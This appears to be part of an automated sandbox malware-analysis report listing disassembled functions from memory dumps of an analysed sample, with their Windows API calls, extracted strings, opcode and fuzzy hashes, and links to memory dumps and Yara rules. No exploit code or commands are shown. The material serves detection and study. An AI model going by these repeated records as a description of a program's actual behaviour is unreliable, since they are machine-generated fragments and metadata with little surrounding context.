Associated: 00000006.00000002.1667139482.000000000102A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667156174.000000000102C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667173577.000000000102F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667290641.00000000011B7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e80000_4ZZ099qJ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4e0838f3654c47f83476b6b54ac34da240c662ec6e691589af34538e28a94c3
Instruction ID: 4f08e662b4ae9729929cf16bba222fff3866f6d827a5294dbce482a22bd53deb
Opcode Fuzzy Hash: d4e0838f3654c47f83476b6b54ac34da240c662ec6e691589af34538e28a94c3
Instruction Fuzzy Hash: 380128337102259F9B359E69ECA1E5A37D6ABC4770B244222FD15CB148DF36EC01AB90

Uniqueness

Uniqueness Score: -1.00%

Function 00E8277F Relevance: 1.5, APIs: 1, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeConsole.KERNELBASE ref: 00E8F016

Memory Dump Source

Source File: 00000006.00000002.1666877068.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000006.00000002.1666860531.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000E8E000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000EA9000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000F53000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666992163.0000000000F5A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666992163.000000000101A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667072300.0000000001025000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667086465.0000000001026000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667102167.0000000001027000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667119885.0000000001029000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667139482.000000000102A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667156174.000000000102C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667173577.000000000102F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667290641.00000000011B7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e80000_4ZZ099qJ.jbxd

Yara matches

Similarity

API ID: ConsoleFree
String ID:
API String ID: 771614528-0
Opcode ID: e4cfffffbb58294757a64225da776d45d372d2de795bb593ac6918e7b21e075c
Instruction ID: 9821e69961383d50dc19b2f0b3b59d414c6cf2699f967190b176dee5f9333eab
Opcode Fuzzy Hash: e4cfffffbb58294757a64225da776d45d372d2de795bb593ac6918e7b21e075c
Instruction Fuzzy Hash: 45D0A770848204AFC704FFACD84205DB7F86E80300F12C5B4E4ADA7305FA34A4418B53

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0110A5A0 Relevance: 6.5, APIs: 4, Instructions: 455COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmp, Offset: 01031000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e80000_4ZZ099qJ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91f980ce3a5f1f15e52e7f1cfbe32ef56c0c03e069706b6c08f65b989e7617ed
Instruction ID: b990a21735a2fd999f9dbca2a1165064865926719d59571c12cdad9dda5275e3
Opcode Fuzzy Hash: 91f980ce3a5f1f15e52e7f1cfbe32ef56c0c03e069706b6c08f65b989e7617ed
Instruction Fuzzy Hash: 61026C71E002199FDF19CFA8D8806AEFBF1FF48314F25826AD519A7380D771AA41CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00E8178A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLocaleInfoEx.KERNEL32(!x-sys-default-locale,20000001,?,00000002), ref: 00EB9AB6
FormatMessageA.KERNEL32(00001300,00000000,?,?,?,00000000,00000000), ref: 00EB9AD8

Strings

!x-sys-default-locale, xrefs: 00EB9AB1

Memory Dump Source

Source File: 00000006.00000002.1666877068.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000006.00000002.1666860531.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000E8E000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000EA9000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000F53000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666992163.0000000000F5A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666992163.000000000101A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667072300.0000000001025000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667086465.0000000001026000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667102167.0000000001027000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667119885.0000000001029000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667139482.000000000102A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667156174.000000000102C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667173577.000000000102F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667290641.00000000011B7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e80000_4ZZ099qJ.jbxd

Yara matches

Similarity

API ID: FormatInfoLocaleMessage
String ID: !x-sys-default-locale
API String ID: 4235545615-2729719199
Opcode ID: 5382464acbe86992af7febc83040c74dca8aef2e82802602713e750cd4bdb6d3
Instruction ID: 82b40633af6c7764202dbb4b0d3acec055edcf73775d4563cd6b3f1d8f771b0c
Opcode Fuzzy Hash: 5382464acbe86992af7febc83040c74dca8aef2e82802602713e750cd4bdb6d3
Instruction Fuzzy Hash: 85E030B6151118FFFB14DFA0CC4BDFB7AACEB05791F204119F945E6140D1B56E009760

Uniqueness

Uniqueness Score: -1.00%

Function 01102070 Relevance: 5.3, Strings: 4, Instructions: 281COMMON

Download Yara Rule

Strings

2-by, xrefs: 0110207F
nd 3, xrefs: 01102091
expa, xrefs: 01102088
te k, xrefs: 01102079

Memory Dump Source

Source File: 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmp, Offset: 01031000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e80000_4ZZ099qJ.jbxd

Yara matches

Similarity

API ID:
String ID: 2-by$expa$nd 3$te k
API String ID: 0-3581043453
Opcode ID: 685bfb83187706e2c434fc693beab80a3e628620b5429124793f3e76f8878623
Instruction ID: c8954a8f4ee4d3b0c38f458eb32fe941cfebcf5a0449b5096aef77fbbba71ee7
Opcode Fuzzy Hash: 685bfb83187706e2c434fc693beab80a3e628620b5429124793f3e76f8878623
Instruction Fuzzy Hash: 1CC17FB1E102199FCB84CFADD985A9DBBF4FF48314B14806AE818E7311D370EA558F98

Uniqueness

Uniqueness Score: -1.00%

Function 00F45EE0 Relevance: 2.2, APIs: 1, Instructions: 660timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00F4641F,00000000,00000000,00000000), ref: 00F46288

Memory Dump Source

Source File: 00000006.00000002.1666877068.0000000000EA9000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000006.00000002.1666860531.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000E81000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000E8E000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000F53000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666992163.0000000000F5A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666992163.000000000101A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667072300.0000000001025000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667086465.0000000001026000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667102167.0000000001027000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667119885.0000000001029000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667139482.000000000102A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667156174.000000000102C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667173577.000000000102F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667290641.00000000011B7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e80000_4ZZ099qJ.jbxd

Yara matches

Similarity

API ID: InformationTimeZone
String ID:
API String ID: 565725191-0
Opcode ID: e6d02bc560d4574231f5acdfbbc1ca779c12ddb09d4e5c3111ef49b6c4d147c4
Instruction ID: 22818bc1b253d03e8356addf36438d031acb9e0bcb3cf57ff32007a4bc0bd97f
Opcode Fuzzy Hash: e6d02bc560d4574231f5acdfbbc1ca779c12ddb09d4e5c3111ef49b6c4d147c4
Instruction Fuzzy Hash: 49D11872D00125ABDB24BF64C802ABE7FB9EF45B20F244065FD49EB286E7718E41D791

Uniqueness

Uniqueness Score: -1.00%

Function 00E87455 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00F37D3C

Memory Dump Source

Source File: 00000006.00000002.1666877068.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000006.00000002.1666860531.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000E8E000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000EA9000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000F53000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666992163.0000000000F5A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666992163.000000000101A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667072300.0000000001025000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667086465.0000000001026000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667102167.0000000001027000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667119885.0000000001029000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667139482.000000000102A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667156174.000000000102C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667173577.000000000102F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667290641.00000000011B7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e80000_4ZZ099qJ.jbxd

Yara matches

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: b54884ab053d54965e9e257799ca82b66576c5b30a05aac105c81965bd6ebca7
Instruction ID: aa85ab483928fb21e02c0d39aef3a1b33ae3618a69021298163690ae50473c34
Opcode Fuzzy Hash: b54884ab053d54965e9e257799ca82b66576c5b30a05aac105c81965bd6ebca7
Instruction Fuzzy Hash: 6FB012F03012028B53305F31A70835837F85D432D0B3040A4D089C0144D72D40006F01

Uniqueness

Uniqueness Score: -1.00%

Function 00EAB252 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 83libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(0102C410,00000FA0,?,?,00EAB227), ref: 00EAB25E
GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00EAB227), ref: 00EAB269
GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00EAB227), ref: 00EAB27A
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00EAB28C
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00EAB29A
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00EAB227), ref: 00EAB2BD
DeleteCriticalSection.KERNEL32(0102C410,00000007,?,?,00EAB227), ref: 00EAB2F9
CloseHandle.KERNEL32(00000000,?,?,00EAB227), ref: 00EAB309

Strings

kernel32.dll, xrefs: 00EAB275
SleepConditionVariableCS, xrefs: 00EAB286
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00EAB264
WakeAllConditionVariable, xrefs: 00EAB292

Memory Dump Source

Source File: 00000006.00000002.1666877068.0000000000EA9000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000006.00000002.1666860531.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000E81000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000E8E000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000F53000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666992163.0000000000F5A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666992163.000000000101A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667072300.0000000001025000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667086465.0000000001026000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667102167.0000000001027000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667119885.0000000001029000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667139482.000000000102A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667156174.000000000102C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667173577.000000000102F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667290641.00000000011B7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e80000_4ZZ099qJ.jbxd

Yara matches

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 2565136772-3242537097
Opcode ID: 7d2dc4457d6f1b8b690e468ba7eeae9625f0358d3690a9e14d49a1028eb60325
Instruction ID: 979ef2a8bbb1996294a16d17a70e40e1fdc23281eaea8bf9b94b778cbc721620
Opcode Fuzzy Hash: 7d2dc4457d6f1b8b690e468ba7eeae9625f0358d3690a9e14d49a1028eb60325
Instruction Fuzzy Hash: EE01B931A407125BD7316F75A94DF2F3668AB45B967140011FD85E6148DF6DD8048BB1

Uniqueness

Uniqueness Score: -1.00%

Function 00E81497 Relevance: 19.6, APIs: 13, Instructions: 147COMMON

Download Yara Rule

APIs

SetServiceStatus.ADVAPI32 ref: 00E8EA10
SetServiceStatus.ADVAPI32 ref: 00E8EA3A
SetServiceStatus.ADVAPI32 ref: 00E8EA67
SetServiceStatus.ADVAPI32 ref: 00E8EA94
SetServiceStatus.ADVAPI32 ref: 00E8EAC1
SetServiceStatus.ADVAPI32 ref: 00E8EAEE
SetServiceStatus.ADVAPI32 ref: 00E8EB1B
SetServiceStatus.ADVAPI32 ref: 00E8EB45
SetServiceStatus.ADVAPI32 ref: 00E8EB72
SetServiceStatus.ADVAPI32 ref: 00E8EB9C
SetServiceStatus.ADVAPI32 ref: 00E8EBC9
SetServiceStatus.ADVAPI32 ref: 00E8EBF3
SetServiceStatus.ADVAPI32 ref: 00E8EC20

Memory Dump Source

Source File: 00000006.00000002.1666877068.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000006.00000002.1666860531.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000E8E000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000EA9000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000F53000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666992163.0000000000F5A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666992163.000000000101A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667072300.0000000001025000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667086465.0000000001026000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667102167.0000000001027000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667119885.0000000001029000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667139482.000000000102A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667156174.000000000102C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667173577.000000000102F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667290641.00000000011B7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e80000_4ZZ099qJ.jbxd

Yara matches

Similarity

API ID: ServiceStatus
String ID:
API String ID: 3969395364-0
Opcode ID: 524b31cd6c8027932e50fcc1ec6c0264ba038c26e6783ef243cdbbbd7e24bb47
Instruction ID: 4cd6e5e19b901d468d66b986d923dd47b51f784f67343105ef2c7dac8980e1b1
Opcode Fuzzy Hash: 524b31cd6c8027932e50fcc1ec6c0264ba038c26e6783ef243cdbbbd7e24bb47
Instruction Fuzzy Hash: EA611634509284DFD751EF78C698B5D7FF1AF86301F01849CE8C89B39ACA799A08DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00EB34B1 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 153threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00EB34D9
GetCurrentThreadId.KERNEL32 ref: 00EB34F6
GetCurrentThreadId.KERNEL32 ref: 00EB3517
GetCurrentThreadId.KERNEL32 ref: 00EB359A
GetCurrentThreadId.KERNEL32 ref: 00EB35DE
GetCurrentThreadId.KERNEL32 ref: 00EB3624

Strings

y8, xrefs: 00EB34C6
y8, xrefs: 00EB358E

Memory Dump Source

Source File: 00000006.00000002.1666877068.0000000000EA9000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000006.00000002.1666860531.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000E81000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000E8E000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000F53000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666992163.0000000000F5A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666992163.000000000101A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667072300.0000000001025000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667086465.0000000001026000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667102167.0000000001027000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667119885.0000000001029000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667139482.000000000102A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667156174.000000000102C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667173577.000000000102F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667290641.00000000011B7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e80000_4ZZ099qJ.jbxd

Yara matches

Similarity

API ID: CurrentThread
String ID: y8$y8
API String ID: 2882836952-392446988
Opcode ID: 1585240e76e23f5ac432962db3df4fc1767f4a3fb2e2e2d56c30806a4d824949
Instruction ID: b52cde30cf2ed58c5bf5dbffdda212f59943f675a217c34c0f9884081a5aa641
Opcode Fuzzy Hash: 1585240e76e23f5ac432962db3df4fc1767f4a3fb2e2e2d56c30806a4d824949
Instruction Fuzzy Hash: 0F514B71900116DBCF31DF38C986AEAB7B1FF08714B255569E84ABB289DB31EE41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01105406 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

___TypeMatch.LIBVCRUNTIME ref: 01105633
CatchIt.LIBVCRUNTIME ref: 01105684
_UnwindNestedFrames.LIBCMT ref: 01105785
CallUnexpected.LIBVCRUNTIME ref: 011057A0

Strings

csm, xrefs: 011054B0
csm, xrefs: 0110555C
csm, xrefs: 01105443

Memory Dump Source

Source File: 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmp, Offset: 01031000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e80000_4ZZ099qJ.jbxd

Yara matches

Similarity

API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwind
String ID: csm$csm$csm
API String ID: 944608866-393685449
Opcode ID: 30071e6dd46f7175779f27311261882f8181689e19e9052fa453925fd678be0a
Instruction ID: 96cd583ce9b97a99a972727e13a06037698e3c85e2c5ba25204160738fd2082a
Opcode Fuzzy Hash: 30071e6dd46f7175779f27311261882f8181689e19e9052fa453925fd678be0a
Instruction Fuzzy Hash: 68B18B71D0020AEFCF5EDFA8D8809AEBBB6FF14314B55415AE801AB281D7B1DA51CF91

Uniqueness

Uniqueness Score: -1.00%

Function 01119A4F Relevance: 10.8, APIs: 7, Instructions: 329COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 01119AD5

Memory Dump Source

Source File: 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmp, Offset: 01031000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e80000_4ZZ099qJ.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: b3f7b5f4622b502bff9c908272ffe1dda8efaa21392a12a15e554640bc84c9b8
Instruction ID: ea07074013257781611b683fdeeede97e93813890f75e575b8718b1eaee58852
Opcode Fuzzy Hash: b3f7b5f4622b502bff9c908272ffe1dda8efaa21392a12a15e554640bc84c9b8
Instruction Fuzzy Hash: 6EB18A32A0039A9FDB1D8F28CCA1BEEFFA5EF55318F144175E964AB285D3709900C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 01104F10 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 01104F47
___except_validate_context_record.LIBVCRUNTIME ref: 01104F4F
_ValidateLocalCookies.LIBCMT ref: 01104FD8
__IsNonwritableInCurrentImage.LIBCMT ref: 01105003
_ValidateLocalCookies.LIBCMT ref: 01105058

Strings

csm, xrefs: 01104FED

Memory Dump Source

Source File: 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmp, Offset: 01031000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e80000_4ZZ099qJ.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: d10aef6f79c844eb9bf6fb12bfe2dd1e8cd390e43f4adf0bf7ecf1a503d7efe0
Instruction ID: 366b581f7564d50e095b087c318c6475b5c52ce1b173ad9e3ded7568501afd1d
Opcode Fuzzy Hash: d10aef6f79c844eb9bf6fb12bfe2dd1e8cd390e43f4adf0bf7ecf1a503d7efe0
Instruction Fuzzy Hash: A041C234E002199FCF1ADF6CC884A9EBFA5BF54318F048059EA149B7D1D7B1E925CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01095640 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 119COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0109566A
std::_Lockit::_Lockit.LIBCPMT ref: 0109568C
std::_Lockit::~_Lockit.LIBCPMT ref: 010956B4
std::_Facet_Register.LIBCPMT ref: 010957AA
std::_Lockit::~_Lockit.LIBCPMT ref: 010957D4

Strings

+P, xrefs: 01095689, 010956B1

Memory Dump Source

Source File: 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmp, Offset: 01031000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e80000_4ZZ099qJ.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID: +P
API String ID: 459529453-3934447324
Opcode ID: 6f765c8eafefe763e85675ddd19d448291c7c2d92ec0b3bc6387791c9394eb51
Instruction ID: 27d126f62e82fb8674bb6a154b61fdad3585c2e8f650d1871ca214b52127d60d
Opcode Fuzzy Hash: 6f765c8eafefe763e85675ddd19d448291c7c2d92ec0b3bc6387791c9394eb51
Instruction Fuzzy Hash: E851DB70901249DFDF12DF98D894BAEBBF0FB04314F248199D885AB380D775AA08DB80

Uniqueness

Uniqueness Score: -1.00%

Function 010CE190 Relevance: 10.1, Strings: 8, Instructions: 102COMMON

Download Yara Rule

Strings

rahc, xrefs: 010D3EC2
tni, xrefs: 010D3F32
aolf, xrefs: 010D3F0A
bolc, xrefs: 010D3ECE
buod, xrefs: 010D3F1A
bolb, xrefs: 010D3EE6
txet, xrefs: 010D3EDA
laer, xrefs: 010D3EFA

Memory Dump Source

Source File: 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmp, Offset: 01031000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e80000_4ZZ099qJ.jbxd

Yara matches

Similarity

API ID:
String ID: aolf$bolb$bolc$buod$laer$rahc$tni$txet
API String ID: 0-2685204555
Opcode ID: 1c5f5149b4baa5e09f7ca34a94864f1fbaa3f10f91f120dd3cb7a88279b10117
Instruction ID: 4bbf3e9de03a979cbf3e2e71d51fcdc8b10763728feedbace60aaff9a9f95a58
Opcode Fuzzy Hash: 1c5f5149b4baa5e09f7ca34a94864f1fbaa3f10f91f120dd3cb7a88279b10117
Instruction Fuzzy Hash: 6C31DBB9615386859EF58E1DC4A05BD6BF27A8361CB68D0DED4E18F297C221C843DA13

Uniqueness

Uniqueness Score: -1.00%

Function 00E848CC Relevance: 9.2, APIs: 6, Instructions: 225COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?), ref: 00EDAA6C
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00EDAAFA
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00EDAB6C
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00EDAB86
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00EDABE9
